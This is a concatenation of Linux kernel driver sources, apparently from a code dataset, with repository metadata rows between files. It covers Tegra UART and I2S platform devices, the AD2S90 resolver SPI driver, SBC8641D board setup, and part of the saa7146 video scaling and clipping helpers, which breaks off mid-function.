.num_resources = ARRAY_SIZE(tegra_pmu_resources),
.resource = tegra_pmu_resources,
};
static struct resource tegra_uarta_resources[] = {
[0] = {
.start = TEGRA_UARTA_BASE,
.end = TEGRA_UARTA_BASE + TEGRA_UARTA_SIZE - 1,
.flags = IORESOURCE_MEM,
},
[1] = {
.start = INT_UARTA,
.end = INT_UARTA,
.flags = IORESOURCE_IRQ,
},
};
static struct resource tegra_uartb_resources[] = {
[0] = {
.start = TEGRA_UARTB_BASE,
.end = TEGRA_UARTB_BASE + TEGRA_UARTB_SIZE - 1,
.flags = IORESOURCE_MEM,
},
[1] = {
.start = INT_UARTB,
.end = INT_UARTB,
.flags = IORESOURCE_IRQ,
},
};
static struct resource tegra_uartc_resources[] = {
[0] = {
.start = TEGRA_UARTC_BASE,
.end = TEGRA_UARTC_BASE + TEGRA_UARTC_SIZE - 1,
.flags = IORESOURCE_MEM,
},
[1] = {
.start = INT_UARTC,
.end = INT_UARTC,
.flags = IORESOURCE_IRQ,
},
};
static struct resource tegra_uartd_resources[] = {
[0] = {
.start = TEGRA_UARTD_BASE,
.end = TEGRA_UARTD_BASE + TEGRA_UARTD_SIZE - 1,
.flags = IORESOURCE_MEM,
},
[1] = {
.start = INT_UARTD,
.end = INT_UARTD,
.flags = IORESOURCE_IRQ,
},
};
static struct resource tegra_uarte_resources[] = {
[0] = {
.start = TEGRA_UARTE_BASE,
.end = TEGRA_UARTE_BASE + TEGRA_UARTE_SIZE - 1,
.flags = IORESOURCE_MEM,
},
[1] = {
.start = INT_UARTE,
.end = INT_UARTE,
.flags = IORESOURCE_IRQ,
},
};
struct platform_device tegra_uarta_device = {
.name = "tegra_uart",
.id = 0,
.num_resources = ARRAY_SIZE(tegra_uarta_resources),
.resource = tegra_uarta_resources,
.dev = {
.coherent_dma_mask = DMA_BIT_MASK(32),
},
};
struct platform_device tegra_uartb_device = {
.name = "tegra_uart",
.id = 1,
.num_resources = ARRAY_SIZE(tegra_uartb_resources),
.resource = tegra_uartb_resources,
.dev = {
.coherent_dma_mask = DMA_BIT_MASK(32),
},
};
struct platform_device tegra_uartc_device = {
.name = "tegra_uart",
.id = 2,
.num_resources = ARRAY_SIZE(tegra_uartc_resources),
.resource = tegra_uartc_resources,
.dev = {
.coherent_dma_mask = DMA_BIT_MASK(32),
},
};
struct platform_device tegra_uartd_device = {
.name = "tegra_uart",
.id = 3,
.num_resources = ARRAY_SIZE(tegra_uartd_resources),
.resource = tegra_uartd_resources,
.dev = {
.coherent_dma_mask = DMA_BIT_MASK(32),
},
};
struct platform_device tegra_uarte_device = {
.name = "tegra_uart",
.id = 4,
.num_resources = ARRAY_SIZE(tegra_uarte_resources),
.resource = tegra_uarte_resources,
.dev = {
.coherent_dma_mask = DMA_BIT_MASK(32),
},
};
static struct resource i2s_resource1[] = {
[0] = {
.start = INT_I2S1,
.end = INT_I2S1,
.flags = IORESOURCE_IRQ
},
[1] = {
.start = TEGRA_DMA_REQ_SEL_I2S_1,
.end = TEGRA_DMA_REQ_SEL_I2S_1,
.flags = IORESOURCE_DMA
},
[2] = {
.start = TEGRA_I2S1_BASE,
.end = TEGRA_I2S1_BASE + TEGRA_I2S1_SIZE - 1,
.flags = IORESOURCE_MEM
}
};
static struct resource i2s_resource2[] = {
[0] = {
.start = INT_I2S2,
.end = INT_I2S2,
.flags = IORESOURCE_IRQ
},
[1] = {
.start = TEGRA_DMA_REQ_SEL_I2S2_1,
.end = TEGRA_DMA_REQ_SEL_I2S2_1,
.flags = IORESOURCE_DMA
},
[2] = {
.start = TEGRA_I2S2_BASE,
.end = TEGRA_I2S2_BASE + TEGRA_I2S2_SIZE - 1,
.flags = IORESOURCE_MEM
}
};
struct platform_device tegra_i2s_device1 = {
.name = "tegra-i2s",
.id = 0,
.resource = i2s_resource1,
.num_resources = ARRAY_SIZE(i2s_resource1),
};
struct platform_device tegra_i2s_device2 = {
.name = "tegra-i2s",
.id = 1,
.resource = i2s_resource2,
.num_resources = ARRAY_SIZE(i2s_resource2),
};
static struct resource tegra_das_resources[] = {
[0] = {
.start = TEGRA_APB_MISC_DAS_BASE,
.end = TEGRA_APB_MISC_DAS_BASE + TEGRA_APB_MISC_DAS_SIZE - 1,
.flags = IORESOURCE_MEM,
},
};
struct platform_device tegra_das_device = {
.name = "tegra-das",
.id = -1,
.num_resources = ARRAY_SIZE(tegra_das_resources),
.resource = tegra_das_resources,
};
struct platform_device tegra_pcm_device = {
.name = "tegra-pcm-audio",
.id = -1,
};
| gpl-2.0 |
PyYoshi/caf-msm | drivers/staging/iio/resolver/ad2s90.c | 2308 | 3510 | /*
* ad2s90.c simple support for the ADI Resolver to Digital Converters: AD2S90
*
* Copyright (c) 2010-2010 Analog Devices Inc.
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 2 as
* published by the Free Software Foundation.
*
*/
#include <linux/types.h>
#include <linux/mutex.h>
#include <linux/device.h>
#include <linux/spi/spi.h>
#include <linux/slab.h>
#include <linux/sysfs.h>
#include "../iio.h"
#include "../sysfs.h"
#define DRV_NAME "ad2s90"
struct ad2s90_state {
struct mutex lock;
struct iio_dev *idev;
struct spi_device *sdev;
u8 rx[2];
u8 tx[2];
};
static ssize_t ad2s90_show_angular(struct device *dev,
struct device_attribute *attr, char *buf)
{
struct spi_message msg;
struct spi_transfer xfer;
int ret;
ssize_t len = 0;
u16 val;
struct iio_dev *idev = dev_get_drvdata(dev);
struct ad2s90_state *st = idev->dev_data;
xfer.len = 1;
xfer.tx_buf = st->tx;
xfer.rx_buf = st->rx;
mutex_lock(&st->lock);
spi_message_init(&msg);
spi_message_add_tail(&xfer, &msg);
ret = spi_sync(st->sdev, &msg);
if (ret)
goto error_ret;
val = (((u16)(st->rx[0])) << 4) | ((st->rx[1] & 0xF0) >> 4);
len = sprintf(buf, "%d\n", val);
error_ret:
mutex_unlock(&st->lock);
return ret ? ret : len;
}
#define IIO_DEV_ATTR_SIMPLE_RESOLVER(_show) \
IIO_DEVICE_ATTR(angular, S_IRUGO, _show, NULL, 0)
static IIO_CONST_ATTR(description,
"Low Cost, Complete 12-Bit Resolver-to-Digital Converter");
static IIO_DEV_ATTR_SIMPLE_RESOLVER(ad2s90_show_angular);
static struct attribute *ad2s90_attributes[] = {
&iio_const_attr_description.dev_attr.attr,
&iio_dev_attr_angular.dev_attr.attr,
NULL,
};
static const struct attribute_group ad2s90_attribute_group = {
.name = DRV_NAME,
.attrs = ad2s90_attributes,
};
static const struct iio_info ad2s90_info = {
.attrs = &ad2s90_attribute_group,
.driver_module = THIS_MODULE,
};
static int __devinit ad2s90_probe(struct spi_device *spi)
{
struct ad2s90_state *st;
int ret = 0;
st = kzalloc(sizeof(*st), GFP_KERNEL);
if (st == NULL) {
ret = -ENOMEM;
goto error_ret;
}
spi_set_drvdata(spi, st);
mutex_init(&st->lock);
st->sdev = spi;
st->idev = iio_allocate_device(0);
if (st->idev == NULL) {
ret = -ENOMEM;
goto error_free_st;
}
st->idev->dev.parent = &spi->dev;
st->idev->info = &ad2s90_info;
st->idev->dev_data = (void *)(st);
st->idev->modes = INDIO_DIRECT_MODE;
ret = iio_device_register(st->idev);
if (ret)
goto error_free_dev;
/* need 600ns between CS and the first falling edge of SCLK */
spi->max_speed_hz = 830000;
spi->mode = SPI_MODE_3;
spi_setup(spi);
return 0;
error_free_dev:
iio_free_device(st->idev);
error_free_st:
kfree(st);
error_ret:
return ret;
}
static int __devexit ad2s90_remove(struct spi_device *spi)
{
struct ad2s90_state *st = spi_get_drvdata(spi);
iio_device_unregister(st->idev);
kfree(st);
return 0;
}
static struct spi_driver ad2s90_driver = {
.driver = {
.name = DRV_NAME,
.owner = THIS_MODULE,
},
.probe = ad2s90_probe,
.remove = __devexit_p(ad2s90_remove),
};
static __init int ad2s90_spi_init(void)
{
return spi_register_driver(&ad2s90_driver);
}
module_init(ad2s90_spi_init);
static __exit void ad2s90_spi_exit(void)
{
spi_unregister_driver(&ad2s90_driver);
}
module_exit(ad2s90_spi_exit);
MODULE_AUTHOR("Graff Yang <graff.yang@gmail.com>");
MODULE_DESCRIPTION("Analog Devices AD2S90 Resolver to Digital SPI driver");
MODULE_LICENSE("GPL v2");
| gpl-2.0 |
jrfastab/Linux-Kernel-QOS | arch/powerpc/platforms/86xx/sbc8641d.c | 2820 | 2614 | /*
* SBC8641D board specific routines
*
* Copyright 2008 Wind River Systems Inc.
*
* By Paul Gortmaker (see MAINTAINERS for contact information)
*
* Based largely on the 8641 HPCN support by Freescale Semiconductor Inc.
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation; either version 2 of the License, or (at your
* option) any later version.
*/
#include <linux/stddef.h>
#include <linux/kernel.h>
#include <linux/pci.h>
#include <linux/kdev_t.h>
#include <linux/delay.h>
#include <linux/seq_file.h>
#include <linux/of_platform.h>
#include <asm/time.h>
#include <asm/machdep.h>
#include <asm/pci-bridge.h>
#include <asm/prom.h>
#include <mm/mmu_decl.h>
#include <asm/udbg.h>
#include <asm/mpic.h>
#include <sysdev/fsl_pci.h>
#include <sysdev/fsl_soc.h>
#include "mpc86xx.h"
static void __init
sbc8641_setup_arch(void)
{
if (ppc_md.progress)
ppc_md.progress("sbc8641_setup_arch()", 0);
printk("SBC8641 board from Wind River\n");
#ifdef CONFIG_SMP
mpc86xx_smp_init();
#endif
fsl_pci_assign_primary();
}
static void
sbc8641_show_cpuinfo(struct seq_file *m)
{
uint svid = mfspr(SPRN_SVR);
seq_printf(m, "Vendor\t\t: Wind River Systems\n");
seq_printf(m, "SVR\t\t: 0x%x\n", svid);
}
/*
* Called very early, device-tree isn't unflattened
*/
static int __init sbc8641_probe(void)
{
unsigned long root = of_get_flat_dt_root();
if (of_flat_dt_is_compatible(root, "wind,sbc8641"))
return 1; /* Looks good */
return 0;
}
static long __init
mpc86xx_time_init(void)
{
unsigned int temp;
/* Set the time base to zero */
mtspr(SPRN_TBWL, 0);
mtspr(SPRN_TBWU, 0);
temp = mfspr(SPRN_HID0);
temp |= HID0_TBEN;
mtspr(SPRN_HID0, temp);
asm volatile("isync");
return 0;
}
static __initdata struct of_device_id of_bus_ids[] = {
{ .compatible = "simple-bus", },
{ .compatible = "gianfar", },
{ .compatible = "fsl,mpc8641-pcie", },
{},
};
static int __init declare_of_platform_devices(void)
{
of_platform_bus_probe(NULL, of_bus_ids, NULL);
return 0;
}
machine_arch_initcall(sbc8641, declare_of_platform_devices);
define_machine(sbc8641) {
.name = "SBC8641D",
.probe = sbc8641_probe,
.setup_arch = sbc8641_setup_arch,
.init_IRQ = mpc86xx_init_irq,
.show_cpuinfo = sbc8641_show_cpuinfo,
.get_irq = mpic_get_irq,
.restart = fsl_rstcr_restart,
.time_init = mpc86xx_time_init,
.calibrate_decr = generic_calibrate_decr,
.progress = udbg_progress,
#ifdef CONFIG_PCI
.pcibios_fixup_bus = fsl_pcibios_fixup_bus,
#endif
};
| gpl-2.0 |
ac100-ru/linux | drivers/media/common/saa7146/saa7146_hlp.c | 4100 | 30791 | #define pr_fmt(fmt) KBUILD_MODNAME ": " fmt
#include <linux/kernel.h>
#include <linux/export.h>
#include <media/saa7146_vv.h>
static void calculate_output_format_register(struct saa7146_dev* saa, u32 palette, u32* clip_format)
{
/* clear out the necessary bits */
*clip_format &= 0x0000ffff;
/* set these bits new */
*clip_format |= (( ((palette&0xf00)>>8) << 30) | ((palette&0x00f) << 24) | (((palette&0x0f0)>>4) << 16));
}
static void calculate_hps_source_and_sync(struct saa7146_dev *dev, int source, int sync, u32* hps_ctrl)
{
*hps_ctrl &= ~(MASK_30 | MASK_31 | MASK_28);
*hps_ctrl |= (source << 30) | (sync << 28);
}
static void calculate_hxo_and_hyo(struct saa7146_vv *vv, u32* hps_h_scale, u32* hps_ctrl)
{
int hyo = 0, hxo = 0;
hyo = vv->standard->v_offset;
hxo = vv->standard->h_offset;
*hps_h_scale &= ~(MASK_B0 | 0xf00);
*hps_h_scale |= (hxo << 0);
*hps_ctrl &= ~(MASK_W0 | MASK_B2);
*hps_ctrl |= (hyo << 12);
}
/* helper functions for the calculation of the horizontal- and vertical
scaling registers, clip-format-register etc ...
these functions take pointers to the (most-likely read-out
original-values) and manipulate them according to the requested
changes.
*/
/* hps_coeff used for CXY and CXUV; scale 1/1 -> scale 1/64 */
static struct {
u16 hps_coeff;
u16 weight_sum;
} hps_h_coeff_tab [] = {
{0x00, 2}, {0x02, 4}, {0x00, 4}, {0x06, 8}, {0x02, 8},
{0x08, 8}, {0x00, 8}, {0x1E, 16}, {0x0E, 8}, {0x26, 8},
{0x06, 8}, {0x42, 8}, {0x02, 8}, {0x80, 8}, {0x00, 8},
{0xFE, 16}, {0xFE, 8}, {0x7E, 8}, {0x7E, 8}, {0x3E, 8},
{0x3E, 8}, {0x1E, 8}, {0x1E, 8}, {0x0E, 8}, {0x0E, 8},
{0x06, 8}, {0x06, 8}, {0x02, 8}, {0x02, 8}, {0x00, 8},
{0x00, 8}, {0xFE, 16}, {0xFE, 8}, {0xFE, 8}, {0xFE, 8},
{0xFE, 8}, {0xFE, 8}, {0xFE, 8}, {0xFE, 8}, {0xFE, 8},
{0xFE, 8}, {0xFE, 8}, {0xFE, 8}, {0xFE, 8}, {0xFE, 8},
{0xFE, 8}, {0xFE, 8}, {0xFE, 8}, {0xFE, 8}, {0x7E, 8},
{0x7E, 8}, {0x3E, 8}, {0x3E, 8}, {0x1E, 8}, {0x1E, 8},
{0x0E, 8}, {0x0E, 8}, {0x06, 8}, {0x06, 8}, {0x02, 8},
{0x02, 8}, {0x00, 8}, {0x00, 8}, {0xFE, 16}
};
/* table of attenuation values for horizontal scaling */
static u8 h_attenuation[] = { 1, 2, 4, 8, 2, 4, 8, 16, 0};
/* calculate horizontal scale registers */
static int calculate_h_scale_registers(struct saa7146_dev *dev,
int in_x, int out_x, int flip_lr,
u32* hps_ctrl, u32* hps_v_gain, u32* hps_h_prescale, u32* hps_h_scale)
{
/* horizontal prescaler */
u32 dcgx = 0, xpsc = 0, xacm = 0, cxy = 0, cxuv = 0;
/* horizontal scaler */
u32 xim = 0, xp = 0, xsci =0;
/* vertical scale & gain */
u32 pfuv = 0;
/* helper variables */
u32 h_atten = 0, i = 0;
if ( 0 == out_x ) {
return -EINVAL;
}
/* mask out vanity-bit */
*hps_ctrl &= ~MASK_29;
/* calculate prescale-(xspc)-value: [n .. 1/2) : 1
[1/2 .. 1/3) : 2
[1/3 .. 1/4) : 3
... */
if (in_x > out_x) {
xpsc = in_x / out_x;
}
else {
/* zooming */
xpsc = 1;
}
/* if flip_lr-bit is set, number of pixels after
horizontal prescaling must be < 384 */
if ( 0 != flip_lr ) {
/* set vanity bit */
*hps_ctrl |= MASK_29;
while (in_x / xpsc >= 384 )
xpsc++;
}
/* if zooming is wanted, number of pixels after
horizontal prescaling must be < 768 */
else {
while ( in_x / xpsc >= 768 )
xpsc++;
}
/* maximum prescale is 64 (p.69) */
if ( xpsc > 64 )
xpsc = 64;
/* keep xacm clear*/
xacm = 0;
/* set horizontal filter parameters (CXY = CXUV) */
cxy = hps_h_coeff_tab[( (xpsc - 1) < 63 ? (xpsc - 1) : 63 )].hps_coeff;
cxuv = cxy;
/* calculate and set horizontal fine scale (xsci) */
/* bypass the horizontal scaler ? */
if ( (in_x == out_x) && ( 1 == xpsc ) )
xsci = 0x400;
else
xsci = ( (1024 * in_x) / (out_x * xpsc) ) + xpsc;
/* set start phase for horizontal fine scale (xp) to 0 */
xp = 0;
/* set xim, if we bypass the horizontal scaler */
if ( 0x400 == xsci )
xim = 1;
else
xim = 0;
/* if the prescaler is bypassed, enable horizontal
accumulation mode (xacm) and clear dcgx */
if( 1 == xpsc ) {
xacm = 1;
dcgx = 0;
} else {
xacm = 0;
/* get best match in the table of attenuations
for horizontal scaling */
h_atten = hps_h_coeff_tab[( (xpsc - 1) < 63 ? (xpsc - 1) : 63 )].weight_sum;
for (i = 0; h_attenuation[i] != 0; i++) {
if (h_attenuation[i] >= h_atten)
break;
}
dcgx = i;
}
/* the horizontal scaling increment controls the UV filter
to reduce the bandwidth to improve the display quality,
so set it ... */
if ( xsci == 0x400)
pfuv = 0x00;
else if ( xsci < 0x600)
pfuv = 0x01;
else if ( xsci < 0x680)
pfuv = 0x11;
else if ( xsci < 0x700)
pfuv = 0x22;
else
pfuv = 0x33;
*hps_v_gain &= MASK_W0|MASK_B2;
*hps_v_gain |= (pfuv << 24);
*hps_h_scale &= ~(MASK_W1 | 0xf000);
*hps_h_scale |= (xim << 31) | (xp << 24) | (xsci << 12);
*hps_h_prescale |= (dcgx << 27) | ((xpsc-1) << 18) | (xacm << 17) | (cxy << 8) | (cxuv << 0);
return 0;
}
static struct {
u16 hps_coeff;
u16 weight_sum;
} hps_v_coeff_tab [] = {
{0x0100, 2}, {0x0102, 4}, {0x0300, 4}, {0x0106, 8}, {0x0502, 8},
{0x0708, 8}, {0x0F00, 8}, {0x011E, 16}, {0x110E, 16}, {0x1926, 16},
{0x3906, 16}, {0x3D42, 16}, {0x7D02, 16}, {0x7F80, 16}, {0xFF00, 16},
{0x01FE, 32}, {0x01FE, 32}, {0x817E, 32}, {0x817E, 32}, {0xC13E, 32},
{0xC13E, 32}, {0xE11E, 32}, {0xE11E, 32}, {0xF10E, 32}, {0xF10E, 32},
{0xF906, 32}, {0xF906, 32}, {0xFD02, 32}, {0xFD02, 32}, {0xFF00, 32},
{0xFF00, 32}, {0x01FE, 64}, {0x01FE, 64}, {0x01FE, 64}, {0x01FE, 64},
{0x01FE, 64}, {0x01FE, 64}, {0x01FE, 64}, {0x01FE, 64}, {0x01FE, 64},
{0x01FE, 64}, {0x01FE, 64}, {0x01FE, 64}, {0x01FE, 64}, {0x01FE, 64},
{0x01FE, 64}, {0x01FE, 64}, {0x01FE, 64}, {0x01FE, 64}, {0x817E, 64},
{0x817E, 64}, {0xC13E, 64}, {0xC13E, 64}, {0xE11E, 64}, {0xE11E, 64},
{0xF10E, 64}, {0xF10E, 64}, {0xF906, 64}, {0xF906, 64}, {0xFD02, 64},
{0xFD02, 64}, {0xFF00, 64}, {0xFF00, 64}, {0x01FE, 128}
};
/* table of attenuation values for vertical scaling */
static u16 v_attenuation[] = { 2, 4, 8, 16, 32, 64, 128, 256, 0};
/* calculate vertical scale registers */
static int calculate_v_scale_registers(struct saa7146_dev *dev, enum v4l2_field field,
int in_y, int out_y, u32* hps_v_scale, u32* hps_v_gain)
{
int lpi = 0;
/* vertical scaling */
u32 yacm = 0, ysci = 0, yacl = 0, ypo = 0, ype = 0;
/* vertical scale & gain */
u32 dcgy = 0, cya_cyb = 0;
/* helper variables */
u32 v_atten = 0, i = 0;
/* error, if vertical zooming */
if ( in_y < out_y ) {
return -EINVAL;
}
/* linear phase interpolation may be used
if scaling is between 1 and 1/2 (both fields used)
or scaling is between 1/2 and 1/4 (if only one field is used) */
if (V4L2_FIELD_HAS_BOTH(field)) {
if( 2*out_y >= in_y) {
lpi = 1;
}
} else if (field == V4L2_FIELD_TOP
|| field == V4L2_FIELD_ALTERNATE
|| field == V4L2_FIELD_BOTTOM) {
if( 4*out_y >= in_y ) {
lpi = 1;
}
out_y *= 2;
}
if( 0 != lpi ) {
yacm = 0;
yacl = 0;
cya_cyb = 0x00ff;
/* calculate scaling increment */
if ( in_y > out_y )
ysci = ((1024 * in_y) / (out_y + 1)) - 1024;
else
ysci = 0;
dcgy = 0;
/* calculate ype and ypo */
ype = ysci / 16;
ypo = ype + (ysci / 64);
} else {
yacm = 1;
/* calculate scaling increment */
ysci = (((10 * 1024 * (in_y - out_y - 1)) / in_y) + 9) / 10;
/* calculate ype and ypo */
ypo = ype = ((ysci + 15) / 16);
/* the sequence length interval (yacl) has to be set according
to the prescale value, e.g. [n .. 1/2) : 0
[1/2 .. 1/3) : 1
[1/3 .. 1/4) : 2
... */
if ( ysci < 512) {
yacl = 0;
} else {
yacl = ( ysci / (1024 - ysci) );
}
/* get filter coefficients for cya, cyb from table hps_v_coeff_tab */
cya_cyb = hps_v_coeff_tab[ (yacl < 63 ? yacl : 63 ) ].hps_coeff;
/* get best match in the table of attenuations for vertical scaling */
v_atten = hps_v_coeff_tab[ (yacl < 63 ? yacl : 63 ) ].weight_sum;
for (i = 0; v_attenuation[i] != 0; i++) {
if (v_attenuation[i] >= v_atten)
break;
}
dcgy = i;
}
/* ypo and ype swapped in spec ? */
*hps_v_scale |= (yacm << 31) | (ysci << 21) | (yacl << 15) | (ypo << 8 ) | (ype << 1);
*hps_v_gain &= ~(MASK_W0|MASK_B2);
*hps_v_gain |= (dcgy << 16) | (cya_cyb << 0);
return 0;
}
/* simple bubble-sort algorithm with duplicate elimination */
static int sort_and_eliminate(u32* values, int* count)
{
int low = 0, high = 0, top = 0, temp = 0;
int cur = 0, next = 0;
/* sanity checks */
if( (0 > *count) || (NULL == values) ) {
return -EINVAL;
}
/* bubble sort the first @count items of the array @values */
for( top = *count; top > 0; top--) {
for( low = 0, high = 1; high < top; low++, high++) {
if( values[low] > values[high] ) {
temp = values[low];
values[low] = values[high];
values[high] = temp;
}
}
}
/* remove duplicate items */
for( cur = 0, next = 1; next < *count; next++) {
if( values[cur] != values[next])
values[++cur] = values[next];
}
*count = cur + 1;
return 0;
}
static void calculate_clipping_registers_rect(struct saa7146_dev *dev, struct saa7146_fh *fh,
struct saa7146_video_dma *vdma2, u32* clip_format, u32* arbtr_ctrl, enum v4l2_field field)
{
struct saa7146_vv *vv = dev->vv_data;
__le32 *clipping = vv->d_clipping.cpu_addr;
int width = vv->ov.win.w.width;
int height = vv->ov.win.w.height;
int clipcount = vv->ov.nclips;
u32 line_list[32];
u32 pixel_list[32];
int numdwords = 0;
int i = 0, j = 0;
int cnt_line = 0, cnt_pixel = 0;
int x[32], y[32], w[32], h[32];
/* clear out memory */
memset(&line_list[0], 0x00, sizeof(u32)*32);
memset(&pixel_list[0], 0x00, sizeof(u32)*32);
memset(clipping, 0x00, SAA7146_CLIPPING_MEM);
/* fill the line and pixel-lists */
for(i = 0; i < clipcount; i++) {
int l = 0, r = 0, t = 0, b = 0;
x[i] = vv->ov.clips[i].c.left;
y[i] = vv->ov.clips[i].c.top;
w[i] = vv->ov.clips[i].c.width;
h[i] = vv->ov.clips[i].c.height;
if( w[i] < 0) {
x[i] += w[i]; w[i] = -w[i];
}
if( h[i] < 0) {
y[i] += h[i]; h[i] = -h[i];
}
if( x[i] < 0) {
w[i] += x[i]; x[i] = 0;
}
if( y[i] < 0) {
h[i] += y[i]; y[i] = 0;
}
if( 0 != vv->vflip ) {
y[i] = height - y[i] - h[i];
}
l = x[i];
r = x[i]+w[i];
t = y[i];
b = y[i]+h[i];
/* insert left/right coordinates */
pixel_list[ 2*i ] = min_t(int, l, width);
pixel_list[(2*i)+1] = min_t(int, r, width);
/* insert top/bottom coordinates */
line_list[ 2*i ] = min_t(int, t, height);
line_list[(2*i)+1] = min_t(int, b, height);
}
/* sort and eliminate lists */
cnt_line = cnt_pixel = 2*clipcount;
sort_and_eliminate( &pixel_list[0], &cnt_pixel );
sort_and_eliminate( &line_list[0], &cnt_line );
/* calculate the number of used u32s */
numdwords = max_t(int, (cnt_line+1), (cnt_pixel+1))*2;
numdwords = max_t(int, 4, numdwords);
numdwords = min_t(int, 64, numdwords);
/* fill up cliptable */
for(i = 0; i < cnt_pixel; i++) {
clipping[2*i] |= cpu_to_le32(pixel_list[i] << 16);
}
for(i = 0; i < cnt_line; i++) {
clipping[(2*i)+1] |= cpu_to_le32(line_list[i] << 16);
}
/* fill up cliptable with the display infos */
for(j = 0; j < clipcount; j++) {
for(i = 0; i < cnt_pixel; i++) {
if( x[j] < 0)
x[j] = 0;
if( pixel_list[i] < (x[j] + w[j])) {
if ( pixel_list[i] >= x[j] ) {
clipping[2*i] |= cpu_to_le32(1 << j);
}
}
}
for(i = 0; i < cnt_line; i++) {
if( y[j] < 0)
y[j] = 0;
if( line_list[i] < (y[j] + h[j]) ) {
if( line_list[i] >= y[j] ) {
clipping[(2*i)+1] |= cpu_to_le32(1 << j);
}
}
}
}
/* adjust arbitration control register */
*arbtr_ctrl &= 0xffff00ff;
*arbtr_ctrl |= 0x00001c00;
vdma2->base_even = vv->d_clipping.dma_handle;
vdma2->base_odd = vv->d_clipping.dma_handle;
vdma2->prot_addr = vv->d_clipping.dma_handle+((sizeof(u32))*(numdwords));
vdma2->base_page = 0x04;
vdma2->pitch = 0x00;
vdma2->num_line_byte = (0 << 16 | (sizeof(u32))*(numdwords-1) );
/* set clipping-mode. this depends on the field(s) used */
*clip_format &= 0xfffffff7;
if (V4L2_FIELD_HAS_BOTH(field)) {
*clip_format |= 0x00000008;
} else {
*clip_format |= 0x00000000;
}
}
/* disable clipping */
static void saa7146_disable_clipping(struct saa7146_dev *dev)
{
u32 clip_format = saa7146_read(dev, CLIP_FORMAT_CTRL);
/* mask out relevant bits (=lower word)*/
clip_format &= MASK_W1;
/* upload clipping-registers*/
saa7146_write(dev, CLIP_FORMAT_CTRL,clip_format);
saa7146_write(dev, MC2, (MASK_05 | MASK_21));
/* disable video dma2 */
saa7146_write(dev, MC1, MASK_21);
}
static void saa7146_set_clipping_rect(struct saa7146_fh *fh)
{
struct saa7146_dev *dev = fh->dev;
struct saa7146_vv *vv = dev->vv_data;
enum v4l2_field field = vv->ov.win.field;
struct saa7146_video_dma vdma2;
u32 clip_format;
u32 arbtr_ctrl;
/* check clipcount, disable clipping if clipcount == 0*/
if (vv->ov.nclips == 0) {
saa7146_disable_clipping(dev);
return;
}
clip_format = saa7146_read(dev, CLIP_FORMAT_CTRL);
arbtr_ctrl = saa7146_read(dev, PCI_BT_V1);
calculate_clipping_registers_rect(dev, fh, &vdma2, &clip_format, &arbtr_ctrl, field);
/* set clipping format */
clip_format &= 0xffff0008;
clip_format |= (SAA7146_CLIPPING_RECT << 4);
/* prepare video dma2 */
saa7146_write(dev, BASE_EVEN2, vdma2.base_even);
saa7146_write(dev, BASE_ODD2, vdma2.base_odd);
saa7146_write(dev, PROT_ADDR2, vdma2.prot_addr);
saa7146_write(dev, BASE_PAGE2, vdma2.base_page);
saa7146_write(dev, PITCH2, vdma2.pitch);
saa7146_write(dev, NUM_LINE_BYTE2, vdma2.num_line_byte);
/* prepare the rest */
saa7146_write(dev, CLIP_FORMAT_CTRL,clip_format);
saa7146_write(dev, PCI_BT_V1, arbtr_ctrl);
/* upload clip_control-register, clipping-registers, enable video dma2 */
saa7146_write(dev, MC2, (MASK_05 | MASK_21 | MASK_03 | MASK_19));
saa7146_write(dev, MC1, (MASK_05 | MASK_21));
}
static void saa7146_set_window(struct saa7146_dev *dev, int width, int height, enum v4l2_field field)
{
struct saa7146_vv *vv = dev->vv_data;
int source = vv->current_hps_source;
int sync = vv->current_hps_sync;
u32 hps_v_scale = 0, hps_v_gain = 0, hps_ctrl = 0, hps_h_prescale = 0, hps_h_scale = 0;
/* set vertical scale */
hps_v_scale = 0; /* all bits get set by the function-call */
hps_v_gain = 0; /* fixme: saa7146_read(dev, HPS_V_GAIN);*/
calculate_v_scale_registers(dev, field, vv->standard->v_field*2, height, &hps_v_scale, &hps_v_gain);
/* set horizontal scale */
hps_ctrl = 0;
hps_h_prescale = 0; /* all bits get set in the function */
hps_h_scale = 0;
calculate_h_scale_registers(dev, vv->standard->h_pixels, width, vv->hflip, &hps_ctrl, &hps_v_gain, &hps_h_prescale, &hps_h_scale);
/* set hyo and hxo */
calculate_hxo_and_hyo(vv, &hps_h_scale, &hps_ctrl);
calculate_hps_source_and_sync(dev, source, sync, &hps_ctrl);
/* write out new register contents */
saa7146_write(dev, HPS_V_SCALE, hps_v_scale);
saa7146_write(dev, HPS_V_GAIN, hps_v_gain);
saa7146_write(dev, HPS_CTRL, hps_ctrl);
saa7146_write(dev, HPS_H_PRESCALE,hps_h_prescale);
saa7146_write(dev, HPS_H_SCALE, hps_h_scale);
/* upload shadow-ram registers */
saa7146_write(dev, MC2, (MASK_05 | MASK_06 | MASK_21 | MASK_22) );
}
/* calculate the new memory offsets for a desired position */
static void saa7146_set_position(struct saa7146_dev *dev, int w_x, int w_y, int w_height, enum v4l2_field field, u32 pixelformat)
{
struct saa7146_vv *vv = dev->vv_data;
struct saa7146_format *sfmt = saa7146_format_by_fourcc(dev, pixelformat);
int b_depth = vv->ov_fmt->depth;
int b_bpl = vv->ov_fb.fmt.bytesperline;
/* The unsigned long cast is to remove a 64-bit compile warning since
it looks like a 64-bit address is cast to a 32-bit value, even
though the base pointer is really a 32-bit physical address that
goes into a 32-bit DMA register.
FIXME: might not work on some 64-bit platforms, but see the FIXME
in struct v4l2_framebuffer (videodev2.h) for that.
*/
u32 base = (u32)(unsigned long)vv->ov_fb.base;
struct saa7146_video_dma vdma1;
/* calculate memory offsets for picture, look if we shall top-down-flip */
vdma1.pitch = 2*b_bpl;
if ( 0 == vv->vflip ) {
vdma1.base_even = base + (w_y * (vdma1.pitch/2)) + (w_x * (b_depth / 8));
vdma1.base_odd = vdma1.base_even + (vdma1.pitch / 2);
vdma1.prot_addr = vdma1.base_even + (w_height * (vdma1.pitch / 2));
}
else {
vdma1.base_even = base + ((w_y+w_height) * (vdma1.pitch/2)) + (w_x * (b_depth / 8));
vdma1.base_odd = vdma1.base_even - (vdma1.pitch / 2);
vdma1.prot_addr = vdma1.base_odd - (w_height * (vdma1.pitch / 2));
}
if (V4L2_FIELD_HAS_BOTH(field)) {
} else if (field == V4L2_FIELD_ALTERNATE) {
/* fixme */
vdma1.base_odd = vdma1.prot_addr;
vdma1.pitch /= 2;
} else if (field == V4L2_FIELD_TOP) {
vdma1.base_odd = vdma1.prot_addr;
vdma1.pitch /= 2;
} else if (field == V4L2_FIELD_BOTTOM) {
